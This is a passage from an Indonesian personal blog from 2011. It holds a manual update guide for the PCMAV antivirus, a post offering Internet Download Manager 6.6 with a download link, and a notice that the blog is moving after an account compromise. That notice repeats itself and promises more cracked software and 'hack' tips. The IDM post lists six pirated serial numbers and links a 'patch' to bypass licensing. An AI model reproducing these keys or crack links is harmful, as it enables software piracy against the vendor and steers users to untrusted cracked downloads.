Worm ini telah dikenali dan dapat dibersihkan pada PCMAV 5.0 Update Build3 ini berikut ini.
PCMAV 5.0 Update Build3
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.0 Update Build3 telah hadir dengan penambahan 89 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.0, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:
SendSpace.com
ZippyShare.com (mirror)
Rapidshare.com (mirror)
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.
Sabtu, 23 Juli 2011
IDM 6.6
IDM adalah tool yang sangad berguna untuk mengakselerasi download, juga software ini sih sangad berguna bagi saya ..(sebenernya relatif sih) tergantung si pemakai ...
Kalau pake software ini bisa download video dari Flash Player dengan cepat dan mudah ..
timbang basabasi ini dia cekidot!
http://www.mediafire.com/?bky6hbbbyh84etd
Serial : - 6NBF3-2AG73-N318M-J6IX0
- L57L4-1SMNI-E8D8F-L7I19
- OKF5E-8TKYR-831K7-F67YR
- N2SUY-76DJH-3SVBS-XB1L1
- 454MY-3JMTD-O4TC4-JU2BU
- 4UW8A-WF3I9-7XV83-K3P8B
E-Mail dan Nama d asal aja gpp ..
Tq ..
klo masi g isa download aja patchnya d sini
http://www.mediafire.com/?wx285cgcfa4vpnn
Jumat, 22 Juli 2011
Pemindahan Blog DzomBhiee-hack.blogspot.com to DzomBhiee-crew.blogspot.com
Moohn maaf atas segala keterbatasan saya, karena lupa pasword email dan psword blogger (google mail)
dikarenakan HACK dari teman seNet yang sudah pindah ke jakarta ..
--> mohon maaf karena masalah tersebut,
Selalu ada posting 2-5kali seminggu, klo sering" nanti abiz idenya ..
wkwkwkwkwk ..
dalam blog ini akan ada tambahan software portable ato software+crack/serial number..
Dan pastinya tetap ada posting mengenai "HACK"/Tips" yang mungkin berguna ato bisa buat iseng" aja ..
^_^
Blog ini akan mulai efektif setelah tanggal 25 - Juli - 2011 ..
Thx ...
dikarenakan HACK dari teman seNet yang sudah pindah ke jakarta ..
--> mohon maaf karena masalah tersebut,
Selalu ada posting 2-5kali seminggu, klo sering" nanti abiz idenya ..
wkwkwkwkwk ..
dalam blog ini akan ada tambahan software portable ato software+crack/serial number..
Dan pastinya tetap ada posting mengenai "HACK"/Tips" yang mungkin berguna ato bisa buat iseng" aja ..
^_^
Blog ini akan mulai efektif setelah tanggal 25 - Juli - 2011 ..
Thx ...
Langganan:
Postingan (Atom)